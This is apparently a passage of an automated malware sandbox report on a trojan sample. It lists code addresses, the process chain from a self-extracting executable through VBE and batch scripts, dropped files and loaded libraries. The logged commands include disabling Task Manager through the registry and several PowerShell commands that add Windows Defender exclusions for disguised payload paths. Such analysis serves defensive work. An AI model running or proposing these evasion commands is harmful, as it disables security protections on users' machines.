                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC40880_2_00CC4088
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC00B70_2_00CC00B7
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CD51C90_2_00CD51C9
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC71530_2_00CC7153
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC62CA0_2_00CC62CA
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CB32F70_2_00CB32F7
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC43BF0_2_00CC43BF
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CDD4400_2_00CDD440
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CBF4610_2_00CBF461
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CBC4260_2_00CBC426
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC77EF0_2_00CC77EF
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CDD8EE0_2_00CDD8EE
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CB286B0_2_00CB286B
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CE19F40_2_00CE19F4
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CBE9B70_2_00CBE9B7
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC3E0B0_2_00CC3E0B
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CBEFE20_2_00CBEFE2
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CD4F9A0_2_00CD4F9A
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC580D748_2_00007FFAAC580D74
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC581EE98_2_00007FFAAC581EE9
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC744E978_2_00007FFAAC744E97
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7436FA8_2_00007FFAAC7436FA
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC73000B8_2_00007FFAAC73000B
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7308DD8_2_00007FFAAC7308DD
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7439FA8_2_00007FFAAC7439FA
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7449FA8_2_00007FFAAC7449FA
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7454298_2_00007FFAAC745429
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7D5DC38_2_00007FFAAC7D5DC3
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAACC911208_2_00007FFAACC91120
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAACC912A88_2_00007FFAACC912A8
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC6330E79_2_00007FFAAC6330E7
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC58B8FA12_2_00007FFAAC58B8FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC580E9312_2_00007FFAAC580E93
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC6530E712_2_00007FFAAC6530E7
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC6230E914_2_00007FFAAC6230E9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC6530E716_2_00007FFAAC6530E7
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC570D7424_2_00007FFAAC570D74
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC571EE924_2_00007FFAAC571EE9
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC734E9724_2_00007FFAAC734E97
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC7336FA24_2_00007FFAAC7336FA
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC72000B24_2_00007FFAAC72000B
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC72003324_2_00007FFAAC720033
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC7208DD24_2_00007FFAAC7208DD
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC7339FA24_2_00007FFAAC7339FA
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC7349FA24_2_00007FFAAC7349FA
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC73542924_2_00007FFAAC735429
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAAC7C5DC324_2_00007FFAAC7C5DC3
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAACC8112024_2_00007FFAACC81120
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAACC813B824_2_00007FFAACC813B8
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CNRzgtSC.log 1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: String function: 00CCEB78 appears 39 times
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: String function: 00CCF5F0 appears 31 times
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: String function: 00CCEC50 appears 56 times
                          Source: kBY9lgRaca.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                          Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@36/84@0/1
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CB6C74 GetLastError,FormatMessageW,0_2_00CB6C74
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CCA6C2
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\iqbcNzlc.logJump to behavior
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeMutant created: \Sessions\1\BaseNamedObjects\Local\95a8a15b4debae5cc9ba5a26d497e25cb314b3e364d37e594efe016891e0764b
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\AppData\Local\Temp\npEqFN9XfGJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCommand line argument: sfxname0_2_00CCDF1E
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCommand line argument: sfxstime0_2_00CCDF1E
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCommand line argument: STARTDLG0_2_00CCDF1E
                          Source: kBY9lgRaca.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeFile read: C:\Users\user\Desktop\kBY9lgRaca.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\kBY9lgRaca.exe "C:\Users\user\Desktop\kBY9lgRaca.exe"
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\RuntimeDll\cef_process.exe "C:\RuntimeDll/cef_process.exe"
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\RuntimeDll\cef_process.exe "C:\RuntimeDll/cef_process.exe"Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: version.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: slc.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
